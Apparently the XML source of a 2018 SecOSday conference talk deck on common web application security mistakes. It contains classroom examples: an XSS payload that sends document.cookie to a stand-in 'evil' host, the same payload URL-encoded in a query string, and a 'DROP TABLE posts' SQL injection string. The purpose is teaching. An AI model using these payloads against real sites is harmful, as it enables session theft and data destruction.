          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3730532" y="5833213"/>
            <a:ext cx="2643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Nuggets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FF3613-F709-468A-8265-6241D60CD63E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305724" y="890174"/>
            <a:ext cx="2458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Cookies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D04DF-2256-472F-877A-0EE609AFC996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8292236" y="3721442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DNSSEC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FD74A5-D342-469F-A230-2F27076DD64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543275" y="4024696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SSHFP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C729B-EDC4-4205-972A-811A4378635A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975163" y="3223028"/>
            <a:ext cx="1847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0-RTT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5E1C7-6CFB-4604-95CC-4F16CBAC295E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5369666" y="4552153"/>
            <a:ext cx="1490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WAF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5EADDF-E789-414B-8D86-86C495CFB21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10300465" y="2663191"/>
            <a:ext cx="1590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272A2A-60F1-400B-8F77-5B3FE16B3D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178335" y="5698245"/>
            <a:ext cx="314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Meltdown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C5B7E0-ADED-42E3-AC80-2B56A320EA7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7657007" y="5850645"/>
            <a:ext cx="2381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Spectre</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19316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5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5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5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5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45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85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1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7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35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6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4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2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95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65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35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195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5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4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0A9A5-5AF4-4929-A790-CD8F77D4BFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022705" y="-1743990"/>
            <a:ext cx="1370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B996AE-97AE-4AA9-9669-5E6EFDB66C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5145017" y="-1984860"/>
            <a:ext cx="465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Bleichenbacher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213755-0D7B-49D0-BF8C-CFB5A21D038B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1567872" y="-1961681"/>
            <a:ext cx="16369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CSRF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A1F3A-ACEB-4E1D-8E19-2F6CDB179848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12863874" y="2156176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SQLi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715E6-B81D-4975-A47A-7343AA092B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4352453" y="7153755"/>
            <a:ext cx="1307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XXE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1296D-2087-4FBA-A56A-D467033903CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13083153" y="7993708"/>
            <a:ext cx="1473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WTF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ECB27-E333-4563-9861-B94816C1D062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14385316" y="4552153"/>
            <a:ext cx="141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BBQ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2A0FB-4D4E-4F12-962C-1F8C80B5FAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3136550" y="4339533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FREAK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F59EE5-770B-4BCB-8487-42A03D63369E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13356201" y="2859359"/>
            <a:ext cx="2642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LOGJAM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B721B-5E72-46B3-AC39-2B2D039BBFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8108494" y="7485896"/>
            <a:ext cx="2010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BEAST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5A39E-E597-47C5-9B38-3FC492B0DCE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2882602" y="7234674"/>
            <a:ext cx="355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Heart Bleed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EA0BA-ABFE-45BA-8708-1326196D8240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2213749" y="320361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XSS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B5814-38A8-48D5-A503-D85318683E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5262458" y="7485896"/>
            <a:ext cx="1977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Argon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C21A3-B032-4A04-828F-0BD3F1BF43C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11310280" y="7024231"/>
            <a:ext cx="2152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BCrypt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0B494-9039-447D-A4E7-1A96F8BC455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13258811" y="-1123875"/>
            <a:ext cx="1968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SHA-3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79D5BE-69DF-46C7-844A-8C9F24F2A684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13071808" y="1461486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TLS 1.3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6FD0E-4F57-40A5-BDB3-DFB19BECB8C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3084976" y="2953121"/>
            <a:ext cx="2693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Ed25519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DE252D-ACC4-4DF6-9A01-372BA1C7FEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1677985" y="-820660"/>
            <a:ext cx="129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AES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6E30C7-BBC7-47BA-83F3-8CDBCD356A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003346" y="-959264"/>
            <a:ext cx="6568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CHACHA20-POLY1305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87E18C-580E-4110-8D2A-88C4CBB48443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-196013" y="7947561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PCI-DSS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CEC8B2-0D14-4D3C-AB47-3C59FBB853B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2670177" y="5247213"/>
            <a:ext cx="1316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RC4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B4F98E-0B42-443F-812F-0802944A250E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12689135" y="4083977"/>
            <a:ext cx="1742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DKIM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2D888F-7C3C-4FBB-B046-AC7363DBE8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10828032" y="-1743990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MD5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00329F-7D94-4962-886E-F3F509A6EB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882968" y="7688514"/>
            <a:ext cx="2643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Nuggets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FF3613-F709-468A-8265-6241D60CD63E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2428383" y="1301991"/>
            <a:ext cx="2458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Cookies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D04DF-2256-472F-877A-0EE609AFC996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12907501" y="5708878"/>
            <a:ext cx="2528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DNSSEC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FD74A5-D342-469F-A230-2F27076DD64B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3024215" y="5698245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SSHFP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C729B-EDC4-4205-972A-811A4378635A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12686517" y="-266080"/>
            <a:ext cx="1847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0-RTT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5E1C7-6CFB-4604-95CC-4F16CBAC295E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5803177" y="7306797"/>
            <a:ext cx="1490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WAF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5EADDF-E789-414B-8D86-86C495CFB21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13636670" y="153424"/>
            <a:ext cx="1590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GCM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2467496" y="1879177"/>
            <a:ext cx="6568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FFA15E-E1F3-403B-A8E5-F47BFBBA0F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2478398" y="3658217"/>
            <a:ext cx="656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Ways we screw up web application security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DE79D8-EF2E-4CF2-8A27-77420F048C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467496" y="3947692"/>
            <a:ext cx="656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Backed by statistics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8764F-446C-4947-837E-1DB50E6E7753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1372347" y="6803079"/>
            <a:ext cx="3140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Meltdown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4400B8-76A5-47C7-94FF-FEAD342D89B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8552981" y="6773009"/>
            <a:ext cx="2381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Spectre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2C97AB-9F46-4913-8774-003225A03B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2478398" y="4237167"/>
            <a:ext cx="656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and movie references</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286677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F17FF4-5FF1-47BE-B7F7-59247C9E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391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16FD203-FE1C-45E5-94EB-67A71A72CD32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2467496" y="1879177"/>
            <a:ext cx="6579110" cy="2819655"/>
            <a:chOff x="2467496" y="1879177"/>
            <a:chExt cx="6579110" cy="28196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60B4481-7347-4561-A357-E29C5F811790}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2467496" y="1879177"/>
              <a:ext cx="656820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TOP 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FFA15E-E1F3-403B-A8E5-F47BFBBA0F8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2478398" y="3658217"/>
              <a:ext cx="6568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Ways we screw up web application security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DE79D8-EF2E-4CF2-8A27-77420F048C8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2467496" y="3947692"/>
              <a:ext cx="6568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Backed by statistics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42C97AB-9F46-4913-8774-003225A03B58}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2478398" y="4237167"/>
              <a:ext cx="6568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and movie references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9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5F736-F1BC-4536-9F6D-1C35C71985C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013863" y="5018808"/>
            <a:ext cx="424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Myriad Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>groot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</a:rPr>
              <a:t> of all the issues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2975534610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2909455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2978727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3176792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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1501484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B97CF3-34DB-40B6-8567-2E15CCDB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924" y="1638939"/>
            <a:ext cx="9001182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query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5199740"/>
            <a:ext cx="121920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54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54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54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54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3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572CD2-317D-4759-A42B-C314AE51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84" y="824721"/>
            <a:ext cx="5669231" cy="3517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398752-C3B3-4201-8D0C-2CD4432D8A9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3745119" y="4341958"/>
            <a:ext cx="4389343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SecOSday – Darmstadt, Germany</a:t>
            </a:r>
          </a:p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17/11/2018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16922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6F7A2-63DE-4AD4-95FC-06DA05C8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3255526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69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8" y="4731798"/>
            <a:ext cx="527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how did I accidentally build a shelf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246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cthulhu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8" y="4731798"/>
            <a:ext cx="275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cthulhu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3741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great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talk is great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140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&lt;strong&gt;great&lt;/strong&gt;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talk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great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F8792-9969-49C8-BCDF-196A4232A8BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687409" y="4776186"/>
            <a:ext cx="550416" cy="30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A42FB-D91E-4416-9AB1-18ED8E2C038D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071674" y="734930"/>
            <a:ext cx="22815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&lt;script&gt;alert(“Oops!”)&lt;/script&gt;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  <a:effectLst>
            <a:softEdge rad="9144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Ayesh’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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 talk is</a:t>
            </a:r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15E9A-5E60-4AB5-9424-E1D0D80B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5" y="4857750"/>
            <a:ext cx="3228975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C5AA9-246D-4E71-B49C-CB9C7593D09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5475060" y="5633914"/>
            <a:ext cx="7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Oops!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7AB657-6B0C-41AA-856A-2E25D86A475C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071674" y="734930"/>
            <a:ext cx="29385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5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Word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  <a:effectLst>
            <a:softEdge rad="9144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Ayesh’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0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 talk is</a:t>
            </a:r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15E9A-5E60-4AB5-9424-E1D0D80B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5" y="4857750"/>
            <a:ext cx="3228975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C5AA9-246D-4E71-B49C-CB9C7593D09C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808310" y="5648670"/>
            <a:ext cx="241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SES_ID = RKKG3-4RHJG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29FEF-9037-4F4A-84DB-585A3761D2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4808310" y="5648670"/>
            <a:ext cx="22973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57801-26BC-47AB-A561-708EFFF14155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&lt;script&gt;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document.cookie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&lt;/script&gt;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612CBD-4FD6-4309-9A06-606E72292693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071674" y="734930"/>
            <a:ext cx="40339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72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Word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&lt;img src=x onerror=this.src='http://evil/?c='+document.cookie&gt;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“Ayesh”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1521564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&lt;img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src=x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onerror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this.src='http://evil/?c='+document.cookie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“Ayesh”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F9597E-3E64-4669-A012-0192D50D7188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2838450" y="734930"/>
            <a:ext cx="5619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3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Char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&lt;img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src=x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onerror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this.src='http://evil/?c='+document.cookie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 results for “Ayesh”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F9597E-3E64-4669-A012-0192D50D7188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4257675" y="734930"/>
            <a:ext cx="46628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9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7572CD2-317D-4759-A42B-C314AE51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71" y="824721"/>
            <a:ext cx="5669231" cy="3517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398752-C3B3-4201-8D0C-2CD4432D8A9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360506" y="4341958"/>
            <a:ext cx="4389343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SecOSday – Darmstadt, Germany</a:t>
            </a:r>
          </a:p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17/11/2018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7559D43-FF99-4C80-813B-849F3AEF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4" y="1059108"/>
            <a:ext cx="4533027" cy="3048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CAAE3-9574-4987-B7EC-4202FCEFBBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096844" y="4338058"/>
            <a:ext cx="4290021" cy="120032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Unconference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Essen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Germany</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr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/11/2018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18/11/2018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87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 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&lt;img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src=x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onerror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this.src='http://evil/?c='+document.cookie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737B0-0D79-48A2-959F-C75788BE0950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="371476" y="4429125"/>
            <a:ext cx="1594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</a:rPr>
              <a:t>https://site.noob/?query=Ayesh+%3Cimg+src%3Dx+onerror%3Dthis.src%3D%27http%3A%2F%2F</a:t>
            </a:r>
          </a:p>
          <a:p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</a:rPr>
              <a:t>evil%2F%3Fc%3D%27%2Bdocument.cookie%3E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7FF1C9-8F48-404D-A3F2-3DA54A16C707}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4257675" y="734930"/>
            <a:ext cx="46628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B97CF3-34DB-40B6-8567-2E15CCDB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924" y="1638939"/>
            <a:ext cx="9001182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query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613" y="5199740"/>
            <a:ext cx="965200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$_GET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5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'query'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]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="54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09755"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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246" y="2337418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6C030-0879-4849-AFC0-062DB4AB8351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436010" y="1638939"/>
            <a:ext cx="822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D2DD5C-F4FF-4E58-929C-867386D191F9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agnifying glass">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7898B782-CBEB-449B-B9B4-F9160F6B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C6EA12-14FD-4C26-8FE7-18E9A918F22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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1126854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66275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860" y="367223"/>
            <a:ext cx="552604" cy="55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458859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80" y="1691427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469" y="2614757"/>
            <a:ext cx="707163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5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sz="2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4841F-1BE9-49D7-9DCA-3497D641B695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675909" y="1205345"/>
            <a:ext cx="0" cy="53201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92322-B018-4069-99F6-8B037DE6479F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005446" y="132209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7830373" y="13220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107035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66275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860" y="367223"/>
            <a:ext cx="552604" cy="55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458859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cthulhu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80" y="1691427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469" y="2614757"/>
            <a:ext cx="707163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5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cthulhu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4841F-1BE9-49D7-9DCA-3497D641B695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675909" y="1205345"/>
            <a:ext cx="0" cy="53201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92322-B018-4069-99F6-8B037DE6479F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005446" y="132209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7830373" y="13220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20894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66275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860" y="367223"/>
            <a:ext cx="552604" cy="55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458859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great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80" y="1691427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469" y="2599368"/>
            <a:ext cx="7071639" cy="19697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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000E6"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'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 talk is great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4841F-1BE9-49D7-9DCA-3497D641B695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675909" y="1205345"/>
            <a:ext cx="0" cy="53201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92322-B018-4069-99F6-8B037DE6479F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005446" y="132209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7830373" y="13220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C4386-0FF8-4B94-9CEE-35FBDCE2A16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="4042064"/>
            <a:ext cx="4842164" cy="52707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66275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860" y="367223"/>
            <a:ext cx="552604" cy="55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458859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Ayesh’; DROP TABLE posts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280" y="1691427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472" y="2596896"/>
            <a:ext cx="7071639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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; DROP TABLE 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posts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4841F-1BE9-49D7-9DCA-3497D641B695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675909" y="1205345"/>
            <a:ext cx="0" cy="53201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92322-B018-4069-99F6-8B037DE6479F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2005446" y="132209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7830373" y="13220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5C4386-0FF8-4B94-9CEE-35FBDCE2A16B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6780192" y="4042064"/>
            <a:ext cx="4565470" cy="52707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091068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44340" y="793982"/>
            <a:ext cx="552604" cy="55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1383652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Ayesh’; DROP TABLE posts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24968F4-FF1F-43B5-8ECF-85E54299E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93061" y="1828587"/>
            <a:ext cx="462819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'$query'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522" y="3368809"/>
            <a:ext cx="7071639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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
